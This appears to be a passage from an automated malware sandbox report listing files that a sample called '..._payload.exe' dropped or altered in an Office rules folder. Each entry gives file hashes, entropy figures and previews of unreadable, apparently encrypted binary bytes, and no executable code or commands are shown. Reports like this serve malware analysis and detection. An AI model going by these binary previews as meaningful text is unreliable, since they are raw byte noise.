                                                                                                      Preview:.<?,t.-.&...!.6m..Lm.I..,..lj.5....{........P../[......i.}!.K...?....}..Z....,..u.U.....R.68.m.."...7...s...y........+D\.|..*..w...{..eb`I...#.U%.`Wl.!...;a ... ..<..l~.....d..K..@.O.)..(..cAI..=_.x0.....: .l..P.....U.1.l....b(...S...A.....#.....6\4C$a..Z..O.SG.....M..}.I.....R...@.'..i..z.<.Tvk...d.l.....]...a.|.O...OP.d.w...A..%Y.06...l.P.#....a............j.C..A..^..$uqp...[.4.W_Q..V..t?;Z.Ne}+`...^}?.t..8./..,...j...aA...b.....t...2gj.......i.wR.&.......:...R.....T.z...Z.q......a7J...".I"..Z.@R...a..2;.9*/c-r....A.#./..=....6p.E1h.)..)]......x...6r($..?..r...m..~......_.4.T.s....[&..*g..Eo.....2..o|<...).h.7....e. .jT/7....m.....C.h...1..X..._...n@...p.qJ....WJU.^.O....3.....P..n.l..|.S.nGn@.Y..0.x..tQz....@X)._ufI.7..!.ug..IH...F{3.....g.Z.....$.<...../V2.*h..s...g....."x.@^yfL3bM*Ks\qYcJ.k.......9%...?..D.......0.=...q.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120614v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):801
                                                                                                      Entropy (8bit):7.724823281280826
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6RqoBp/vLvnrHuaYG9jwhvl3tD99SiVVvh4lA6XwV/s096kE0Q5xRnv6cii9a:6qCfHuaZ9jyd3P9SAV5UcVE0K1v1v6bD
                                                                                                      MD5:5CE73E78C305F0457F3F37588BE6B91C
                                                                                                      SHA1:9AE668057ADDEF39286132D16D2A096349EF9AA7
                                                                                                      SHA-256:7248AE092877E2EEF081E70403867360394639EEA2C677E1EF923F4CC781ED3D
                                                                                                      SHA-512:857334424D363E21C8CCB80C621A55D5C2C3DDBF946A0C61BDB64072552B06D337E53315D82E15A6E2C7C30ED636111639F804358EA6DDB0C156FA2B0AD0E45C
                                                                                                      Malicious:false
                                                                                                      Preview:.<?#.....u(y...h..t{dZjo~.?.)3...o.-....5.nc...@.Zn.........qc."..a].c.W[]..8..;...=#.E.0.9.~.....e..t...m...E.w..,n....! .tCc.$.........ow.y...._"{a!... \h...BQ.d.@.....$.aZ'...,..f0.Wr...(..~.F..^...9>.B:... .+f@NI....p...`.m..xM+.=...../Xc(n.\'......Q.i...2.Yh...D...m.......an.x..'70...........i.......\~.....fp!...%._.b.-........7.......*{O.e.)Qu.4R....'.U.=........D .e.HK...}V......./.-7.F./...h...j..(.V.b.D..Z.k.......a.39.....h..u..._A\.q.'.z....0@Q.K.@.l..!.....4Z.|..<..x.R.8...:...4.t....b{w:d.M...."..PO..f....wH...DvX)..DA.D...V.5.ox...t....j.:!NR....4.8...r@......85...j..2J...3.&..Om ...+...iH>....5..'.(t.xB.q.h.;........[.u.3...(,F........m..&..Ve...P...b&../..&.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120615v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):741
                                                                                                      Entropy (8bit):7.765339595427083
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:d3tPG9ss4Ftbc/hnmjakjZAowtz5tUvCfKT1b/0ywflH+VescsDkq1v6cii9a:K96FKhnc1jZADtz5yvhRoLsTDVv6bD
                                                                                                      MD5:030B808B800C044677DBE6B364F5436C
                                                                                                      SHA1:78A7C6E334A6650C1D42457BE32D21EC1DFB78D4
                                                                                                      SHA-256:CA29AFDD4DAD7B977C7F6F6C76F6AA9E4772348218F4911BCEE16DFE503CB8D9
                                                                                                      SHA-512:22BFA2E955E1CAD458E001A021AB4F01502C5532F3E60B4A8DE179B120058C56F4ABAA005AA48457E30FB3E68643DAD402D4186EB7A0215FF6E7946439AB5ECE
                                                                                                      Malicious:false
                                                                                                      Preview:.<?F.&8u.=..F4J.P...e.....`+...K.Z.....R\....d.V;.%l.pt.........^.....NT.......UTl.Y.w.P...y....+G.y.1|{.........C..VU....d#....~.Y.M.v".Y<.:nQ.]8.(/t.....s...>Z].....1|..P_...v.%..b..u8...gT-..L....o..M..n...C.L...9..s{&..|=1.{.](&B.T0n@./~....C..RO|..Ra.5X..*...........X.3`..l/@......."...tJVB0!..gZ..w..*j.|*q)h.g....~.br...S....w{.i.Z.2.....?R.....d..../....."t.kG...P.......Ym...P.}..b.)..v..:."i..I...J..S%..~sp.q...B.{/9.^..E...".....~........}.&....J&c..Rz.$..k.v ...X|H.4...|...FV;4...E.....D^.-^F......d..<..e}V...a.Z.;m...`.D.![....7.;9A.x&&C.^..g.D..(.gOU..cp'....X-.^./9r.=.....nv)z.]...t........#.z%:........WyW.\k.z...chZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120616v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):820
                                                                                                      Entropy (8bit):7.733445116835129
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zg2SnTtTeIsKAmPX6wDuZWNT+xfjB7v6bD:c2SnRTelmPqGRMtwD
                                                                                                      MD5:EA47C987DA6B09AE8C6A0B2A9D260E33
                                                                                                      SHA1:02C04148E54EAB8B98E2B9F5EE8F97BE3BFE9396
                                                                                                      SHA-256:46B938565ABA7FEE68732B21A34F6CBCB71525FE5816FE53D94D3DAEBBBBC2DB
                                                                                                      SHA-512:066CD03158687C78EB099B185C0777E7AB910CEABAB084D3468EFD0E8197CAD6B03403CF866C09838F4D10E77BCA7F1C567A8039A9A2AFD3D33C72E3537BDAF9
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..x.C.(DU........\..F.T........p..BN.S.N...S...@....Xp5[.;|.{..4..B.p[j.CaWh.v?.)&.N.nU3$.....3w.H..#....pv.....h.......Wt......"..p-g..fB-.w...4..m j?v#,.^e...y...4bN#..H>+.>P.....Z.@G.ka...l..r.'.B..j.j!SFfh@X.*..E.3y.."%X..*..n.N_..8y&Z.WQ.R[.....x..l..=..K....#..L8E..x.}.=bi..]01...v.....BQ....K.P<.xX..wjHl.]Q.......\....,.iv.8....F.`..v.'2v..>G..?........'.L.. T.G...l-..7}`...]:w..4.........0.ym..~..[..F..G..."..<....%...U6..<..dz.S..z..R...`s..<..eUc...IU...5...Q.:..`.G...F.b+hTi .......)s.j...*@..<.,k./Y.=.N..//9.%."..jX..s...?.f...c....O...x6.....E.j........H....g...E...%W.$........B.|....,..M...G.CV....|G.pU.A.x.3..}..|....8.......C.^t,X..K...`..!)CCS.H".....s.7.HN..^Ax$...6.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120617v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):761
                                                                                                      Entropy (8bit):7.6832902480075544
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MZpMnWS+ui/rL+O6aJRejyoJVHH3qoY/HUVkFoCoh+rOeSuXCwtHPnv6cii9a:0kqrVXLoP8/0Vk2rh+rOeSmCYH/v6bD
                                                                                                      MD5:BBD74BF22F388B08ADD76717411EB8B6
                                                                                                      SHA1:1EDDA3DFFA9780B96D0120D5E985DF9E1FA29ED3
                                                                                                      SHA-256:4BF2B2A316B74506C4FFF9F66063B0F75313766B74756A6C3A16859583C2F975
                                                                                                      SHA-512:C83ACF46815BB3F01AD301C65240B652E3F88FDF6C8005697CE812A3E7EA769BA459C628DCE374599C3002948E30FEF452A3857F86BE493ACD09B2872A247612
                                                                                                      Malicious:false
                                                                                                      Preview:.<?B.6..Z.....L*..T...E...Ca...q.......E.d.........A$.W...B.G8.G.d.E.W.|)...0...~....&.@.~.4.P.T...#`c.....d.f~T.|K..I.?...V.D...An[l.?Q=.gP-...+t......vs..Scd........}..d;...)/d1.1......p.>......7.CR2y..7o..QK..'.]. A3..<...b.m..$.1X.d@7V..ze......E.7.P.s...=.........A2....)..;wbR..w..@-..M..G.\..]wu..4..J.89.B.....D...jF...............k.\.B.<JX..v(..8.........h.0..e.6i..%..X..c..V..l...E.\.a.N........B....*....[.R6$.A..6...O0b..z"M~.],N.?......K?SN..$[...T..i..*.!).u....y...d..{1..c...6.........v.U.K.a=......_...7|M... ....C.}.......-.U..y.....y...<g....h..0K..........7[z...>.w6K.6w;.w..?d.4.S.Z5..y...[...;8|t5.p.....9...... .q$.....V\5....}.PhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120618v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):820
                                                                                                      Entropy (8bit):7.733761602633245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:jvC7xiup9z+4Z+bxrFhRyL3W4E4sYvYy4oznGnZYS6oQf/SU6YMPALvKCv6cii9a:jv+P5+zAGcvYy4AnIb8/o4TKCv6bD
                                                                                                      MD5:1AD2A7F48CAA190AD4F9F85FC7F1134A
                                                                                                      SHA1:69B58EF0F78DD8F2D4A1D25C2EC2BA0E77F32B63
                                                                                                      SHA-256:4A69E4FD55D57EC4E713E7FBA559EDFC04C670C9EF78926E02D28A7EFD36EC97
                                                                                                      SHA-512:438D8421D76E5948CCF2ADAEB1BBE769D1FDA53C0EC700FD449DDE69F2DEA0735FE968F6704EF50D9A01B031F13A36D869E0F0BD97DA2F1BECC671B0E5BBF757
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..3T...[.G-.uy..F.L.J.....D......|....gm.....dF....++....d.WO.`.]i.f.....tZ..hC..G.vx?........x.V.lBO.`.:..!..Dw.QXG....z|..:~..l.....H...}.h.`....2C.t*.E...2g..P!cY....... ).E7.........26....n..........x.....\.lO.".["........IAI..Z..t.....S.H........e.8..~..u....7._F..D..\.t,....G<..HQ...|........ea..d.........M.;~f..."..C.G&.jA4...W...$.+/=..n.<..>)..o .>.yiI.....j.^.)..3...YAE.Ws.R.!.:.X..>..yB.r,...6...\.A.L....!7Twa.........w..F|.mY.w.).#..*..b.*......7..f.w....?S^jY.......zO..=a$..[.[.S\...._$..]1....Ea.x.y .....-b..DB..C...5.O..?..b4...y..Rd....^.8...6u..=.]...Qq...s.cB.2C...^.c.KI..&:.$.e.Fg....&'.........tB.....7.... ...".:..=.Y.C..y1....~G.r.}f-.C..!..H....h.4..f7p..}...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120621v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):749
                                                                                                      Entropy (8bit):7.760710017587498
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:KgGisIc/rV1lq6P0x+Cac1nq3GIDWMpcbcfUSk9Znv6cii9a:5GisRqA0es2fDxTUHnv6bD
                                                                                                      MD5:73D08C423CA6F35D2DD063F2B861329D
                                                                                                      SHA1:8AAD37D8C52A4406EB398ACEBAC18F20BE0BAA93
                                                                                                      SHA-256:E4894F253EDE8EDE2550066BC56F977199C765093E2C6D4903A2CA2FC6B19845
                                                                                                      SHA-512:2C5E459A3B05A82B635BE3499E20938C4F769CA38D4BFAB92415E42F890028FBBF408F6D9FDDA9334503EBCEBA170F718F9AE4DEB17C46C8EFD4F76A3A7D70FC
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..d$...6..6Oc4.......j;.E.O...M X......;!........&f...z.O..^=<...,Y.ga...H...k'.q.'..xG..RZ...U..A.....<~....u..`.........BT.-.j...O`.6#....../..Nj..........V.Y..4..T..L:('..^.(...~krW.&.N...A\m.j[....^N>.|Wp.]..|./......qu$}...L\.p..Fh..r.I:!.yz,.~>..^N.%}......U.m..T.].....(OY..\...&....7d.3G....Di..`,dh.L....F;.o>..T.~.G.#V.He.P.%:..k<0;c.K.+...E'<........J]=.7.. .S...^.o...~.&..'9. .p.e...p.l"..c.[cg..../."..0R..Dg.1.Q8!P...........M.5...2...~{....[j..'.c.-.)]K.$..iu`'....{eu.....x.D.P..+..m.{..[h]+.."V.h./?Wl..g......m[.e..!=.V.C+I..&...("Z/.y.#..y...y........+.x./..a...n.*#fm.>...>e6.t.*......1.....e.7...Q..:.uC=..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703400v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1722
                                                                                                      Entropy (8bit):7.881616811315754
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:jU7Djf1jSaQLvj91T8rsQs7IX3BD7PYgY/2dZ/MCIND/VSkyQB7pQ4xWdI4l9//s:jUbNwgjsEBQg30CfUB7pQ489l9XwD
                                                                                                      MD5:75FB9BA97D2279C1817B2ED01781C239
                                                                                                      SHA1:3052D9EFD567007044F9C8E8564BEE661C5C107B
                                                                                                      SHA-256:922BA2C16153245D34F22A335D11D7EE1CC854D6AF5EAE9A83C7B9373F64BC66
                                                                                                      SHA-512:2B0B9DE6A75BC5D1755D671FA466C2BB9DC86EE00ED7F58453B71B8F1FD69D90EB9AFCBA0B69A3F58A930A2B4C3E1FF9DE6AF7A5ED936DE4F86CDD4C2C136CAC
                                                                                                      Malicious:false
                                                                                                      Preview:.<?i|...?..@M@.E....E.ub..R.,!|.5.....W.q........4.._....6..ivhP..=......6C..eVd>....Lbv..~..+4=.|.\..Q5.=.2..ZM. p" .R..L&C:.I....D^.i.B...:,o..b..&.e..]a....4...3m.tV............n.....X?......Si...0._.`>....[yJ?r.o \.!...F.G.Mz.x'.......`...\..l...HA...&....R.wj.6..Nb.S.$..SJ..y.....$V6....$r....$&..f..~*A~..N2...a.....ij..:...*!.\...5.../Wo.PDa...e.)(!l.YPv....{...."..~.c8 F....nC..8U.....n.(}.......?n8.......JH...........@.e....Qo.ge.w%L..{.G..<....R2.q]L.g.w.Ev.{....`..^...../..[k.T...VZ..al.M..uh.XG2...lX...>.#b.k..%^.{..#..b,.0..cY...@[.....Q....$q...XL..k....e.wi.Z1'....Yne.X,:.p.9R.(..~C@J..Xk....R.sAheK.G..n6..r.3...\*....e......o.fw..5X.c../........>f-..9.0.>b.=.&9......?.8 ...)....?@cM...v&~......}Y5......A.....;b...x.d...9dY.>&.}....X.H....v...g1....T.kI......#.X......(.1.&m............%./4%..S.....b,n.....Dx..8*......?X#.....e.v.a..g.....?.d...F38@v.*...w6u."...%.|.....U^.....Gl;.......`..H...~y.."u..[..[.9...&.7......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703401v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1759
                                                                                                      Entropy (8bit):7.902177553564731
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:vjjIYlNpJ3hlvW92hM0Iup84rx0QhJme6PE98WtwD:Q2NvLxh59rxN6J
                                                                                                      MD5:BD38B6962122D4795E760CE270228F1A
                                                                                                      SHA1:B3CC3095396463ADD05E7141872A5DAE39876FAC
                                                                                                      SHA-256:C6F3841AC7ECE692A35FF59C4943AC5AEFCED250447529BDA4A2A48BF75D036B
                                                                                                      SHA-512:1B5E59A6676B19A2D980B48B850B10CEFB685BA90D6F6F7B737D1E3FDD4CB005447B97314FAF0DD4C17FD95CB5CC797C1752D791781AF3076A22868258B49F97
                                                                                                      Malicious:false
                                                                                                      Preview:.<?e..(`T[)Hgi.....`...e....w.... .x.}.,..P....z...ml.$.%.&..9..D.....go......|.8G.....s..b/*..{...."/.&....U{~g....v...4....31...s'..r...]c.:.l.Y...?..M).r........c."9..p..:....$..9.!....|i..b.5...........5..=.{.k.8...p)...}.r.{w...9..N.M:..m...K.b.wM....m....R.........`.V....L......SFm.,..#:.B<.+..=`......zp_.%U..&..t...d.q....:v.H...v...U.....Z4...~H...>.,.ut6...3M.n$.t.O'....>...,,.i..t.R..9......i..?..f......9.....SfK.|....^..A.9.m.#..L.1.a..\..n...:....&......c..b.....$p..LG....[zVr:?".g........i.1.+&.)c....[...'.....;...W..q..{..m#..Kp..e7.5,.../....TB.=q.v....[i~!.~^.....A....i......A.._....$..i.Q...rh.wl{..?;.......&.e...1.\"........u2....R..vo.D..s+.9.N.H.>c.......Q.-......2..>.k.f...#......w6.!..]..h......&.o../.a.yiUF.vux{...73|e.n.x...%R.$]......g....J\..8j..r.r<.....S...Lu.k.z.....=O]..L.Y+c.....On{%..`...TKce..uv.@5...Q5.........Q.6..<+.~g0gDw,.J...._.....9.+.3j......Jn.bm#.<.....r.'..E./zx....r.r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703450v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1706
                                                                                                      Entropy (8bit):7.880742838305893
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:VCGeEWI9Kr1+pNXQOvo1Vvj4w47rG3mzLBQewD:V2btwvo1h8RZq
                                                                                                      MD5:FD013BE95507AEBEBE0DF430E0428D41
                                                                                                      SHA1:1782F362A040012C158BBAA768BE8CBB8B159057
                                                                                                      SHA-256:72671E5480EBE18D3560ACC52F1D6CEB51381DFFACDE929857FDB3E0CAE6107B
                                                                                                      SHA-512:A3EFEFBBA48959BA8D01592E4588133352C97E3874CBF4D93C14F94EBDA763B8249B499DEDF0A0AD7A579215563B262CE6134B22C832E2AB0CCD5B8121C859FC
                                                                                                      Malicious:false
                                                                                                      Preview:.<?_.rV..O..)*.q......3A..s..v...CN.+%....m.lLe..=^.7.0...b.s#.'..F6NM..k..9;..k...t...=...W....\h5...kdh.^>....!.O.H?i' V...U..y.. ?.......E.}.b..Z.a.......d...%...O..c.p......V.P.M.,......j.^[X...h....-....mI...X.g.m..B.r.4y.......o.;.].#G..3.\.%..6...s...=....U4.......V.!...E....l....C.......n...co.LB.N.W..._...WB.....%.]..`4..e.}.L.7...j.\..(M.....5....<...>...|\E.jL.8x.z.;.Wq.lO.M..'e.&..Z.:...6.........-.....1<8...'......z....,..)..l.rLWj..V.....!.iz".4......J.\[I>D.&.......uY...K.[...f.....3#..w...`.I.J?.....{.y.....Y.z.....j.6..q.w..........M........!..|....a...5D.e|.6['...Ufh..c....*.Pz......>..Y.u0>g....9S8>.xl..|..&...e.1.q..B3/k..;.Rn...........RX.t....\.n..>^XR...z.;.3-.*U!....fvY).8.A6%..Z.,.m...+...5.`.)V..[[6..5#..P...~A$k..j.bd..h....3..A.>.!r9...k...n1.....<6...o....;.h......kb.n.... .ru...Y..-.....F!....\P.9...W....t..=q....RlJ5..)O%*@.f:.1......p....U.".Bs.{..g|%..~...E).../..%.G..e..mIyE..s.8.k.P..V..U..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703451v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1743
                                                                                                      Entropy (8bit):7.89804743642543
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0QJqUw4ybzt9n05SpIhgaG1oVSsdMpH31D8M7wD:lYxftluSE1GISsdMphw
                                                                                                      MD5:0D82FDDCBCC255D7DD19BD9F0D23723B
                                                                                                      SHA1:C439C265B1A05DE1A20E6C8C29BBA0CC61941EF7
                                                                                                      SHA-256:D04A4908386EBC6330E08D6906254BDDB6A6794D8071309F26A41AFD2576541D
                                                                                                      SHA-512:E63451C9D43E04F42FDBF22000BFFE367E00F1045B32C2403DA85C31AB7B9C3F623E2870FE6E74E6842E7B68CD3B5FA122B7A2E369B12E771D8D4B6921556EA7
                                                                                                      Malicious:false
                                                                                                      Preview:.<?n.?.....&..9..D.%1O%.s.s...k.N.)c....)8.eQ....Zl.........:.U.^.wKG.I$....F./....k.o..?.4... ..Ap..v.p\..$.F....7.}....n.~n....jS.7f.....\F.......M..M.R~..N.K ..O.F../..4x<*_"o....1.1...j.3W......_.M.\R.~...e^.......\#&Z].........I.,....N..~.@r22..h.d./S..t..{.#.e=\.o......Z..Ga.....j.........?....;..M+...X.M........;o.i...3!Kl... ..`h....O.8u.J.9. a ..CV....0.i3.y..}.G8#.....?.#oK[.~%...........z..@X.m!.....V..P.\9E..n.*.-...1.p.*p.m.~r...^G.)....@..-.4~.B......$bf.........,:.M...........JJC...C..%c8k...D.....f?...W....-d.:".T..........(.....za.^+..G.........c...1..M..t..E.t.e)...n..@......h....L%.........eq..&.b.x.#...z.-gm.p(n.o....R..x;_..".zh}.K0..Br.*_..4..kd/.;...........M.d$...q.....W....w.. ....vh..V...Qp9..3J.A...G.@..._v......jP....;J....P....N..v=......De..x.."...`....S...IY$x5...me.ge..C....9.J=h.|I..7r...Ey ...>J..z...te.).'...~.N..0R.....!<.th.S..5......Q...>H.+......!U....1....J<S...h4%.aSV.o.O...wnw'.89F.c1}.[]..%.s...Z..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703500v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.884880659622776
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:jIF4gDoyamTutxspDMlgzzmazWQqlvEcgl688hvBAhwwD:kegDovmTuAfmXQUBgl6bY
                                                                                                      MD5:C794CDBAF372B1BDD3BAAB0B134DFABA
                                                                                                      SHA1:76AC3036DC88E2B797D06A3C1EF05DDAA14AA064
                                                                                                      SHA-256:8C52AFC0E8967CD34FBB67F36B3A7117FAD844B3DBD2184EEF75283A4AB7C5D7
                                                                                                      SHA-512:003030EDA41D7F1D0F01B2C0C399AFA03AF7A5A2C1EBF05F0268BF0D4B9967DB004F4FDDC1ECF944EAEDB0B10600E362E5B17D2D0BF3A7018EFAD9EAEC32CA5F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?oBIX...+."t..Z...c6.(XI2N...z}G...U..u..WW.Z=5@......6.......u..0H...:.......8.z'.&Y....{r...._k. ?....>A#.$XS.;)....z.....]5<4.P.0..wrq...5.H.h.&M.-.1......1)f..=O.S.iA.}.K......~."(......Z....3.@jd..7..mo5yL]..Ge.$..1].H.P9....}..5Eof.>...^... A.s..y.....:..=#..q.q?/f.{.2&p#...k.....{....1..L.....&Y.6g..M...;....UY......o.D.Lx7va.b.M..>.(..H..;..7.v.v.....3..N.Iu..F{..4.\9..y...t....#.~................`X.D.o/:......8.^>......H.b...8.|....ye.:...n......7....&..-b.3....Ju4ot...6....V.=qwn.&e/.vA......_.....%........5...;...m.`x#.q..f."..o...?..J.....aM.j.Pc.`q..=c)"...A}.|.l...Lu......(.......P...qt.~.j..E....I)x:A{.1...H.=0.<o?<.1...FOX7F..&..N..k.'D.(.......p!Z+.k...fu.....+....^..bVM.....p;.)...n...d....#....j.....c.I.....#.Y\.k..7..4.W"....:w...]....J.&v.............Ia..............Q||..x.....l....7e.[F.."..%).76eW.8.Q.C.mE....cW*.........L,y.....W..2w.../1A...z.N)UD.Q....p*z.P..=..O$.....c.2]0&/...pbLS^...DF......A.t..X.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703501v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.8607135336341365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Hs/qm8BsTsaC/l02+Ldh+EtikBqTBPjT7wD:M/qDBsTsa8O2y1ikEt/w
                                                                                                      MD5:A590C06844FFB11D3507108399D1C085
                                                                                                      SHA1:0DB2382ACAA99C53564A0B8F2C35AA346E1AB5E3
                                                                                                      SHA-256:2DEA5CF5121F2546EA043DF1E1E5206C404E835513F7DEEF1E444F9E2F650436
                                                                                                      SHA-512:A66BEC288FBA7840A0242A33CCBEDE38812EB689E5C1149E2FB3C24D3780C7F60B5E01273A4AC367A908BCC8867A6AFB9CF01AA6F669A41D6355D6B0E84EB9BD
                                                                                                      Malicious:false
                                                                                                      Preview:.<?#..B....O.;...+.&k.............Ga.......E.I....7/.~.]...}.q..pPY.p. .F.|.yd.....2....<.f....M..z.h..i...$@..a.Bh.C.d.......?.)M.$^..z\TaIoNB......t.......f....r.......j7w{..."...C.,..T.-..~.Y.....6U(.......S..V..V<..x.......G...m**...6..0..r.8.....PkN.;w...-0.D.u..8R....9...U.7.!.....0..@-$.t.|.uRB.*U[^..ib8C....1.%.9..r...g^{.:pG.s.O...z.........|.dZ.....N0...^.i.Q.6.B..{1|...T....n1~?.$.h....g.Tf>...........B.{.D...........uH.../..=3a>.!!.]5..v..X.e...&...B.b.1.9....r.w.63=>/^..a.xn...n..o..N.sgN.......&.MC-@.X..p...iXZqZ.. 1a.P.:.w....Wy2...T...j.{.O..v.%..E...R.....|J|.!..2.K..A..I.......K....=...|..q......F.;..#W..#8{..O.!7...t...i:.....MN...sO....P.........J.Y.JEX.E..`..k..U.S..h.T."$.J=W.5J .;Y)....K.9T.jb...V.3w...dQ\.}.pG......1N./..............7c....w*....~..2i...-C.3.uKV..@.xY.0j,.^.E.x.....f..8.c....(.G`;..,.'.../..!t2.DB.....G.6.F..$..G.. .(0~......,5..y/.....xh%Nv.^`..T"..A.Of...IS.....X~.D).Km.V........K.AC.~=.&.A.;unr....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703550v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1706
                                                                                                      Entropy (8bit):7.876424171724571
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cqPV2JCV90fAc6Hh7HgJaGJOikhvGcNRwD:/V2G99OQm
                                                                                                      MD5:D923FD248377E4893E7FD90381F6722A
                                                                                                      SHA1:BCB6E8574AAE6FDF2ACE904F6F31CA5613D85A26
                                                                                                      SHA-256:8F15366A99BF19122009CD1D6DAB2BAC834346EDB38EAEB4603C4DC0D2FE0461
                                                                                                      SHA-512:CAEBFD9B1D9717FC2283A62D8DE3FA14BF38CE58C785EFF41A367B69AE27BE50038F8D149B02FD5D21989E0F943A429113DD9B87E6974E56A0475F8F5F3B62EC
                                                                                                      Malicious:false
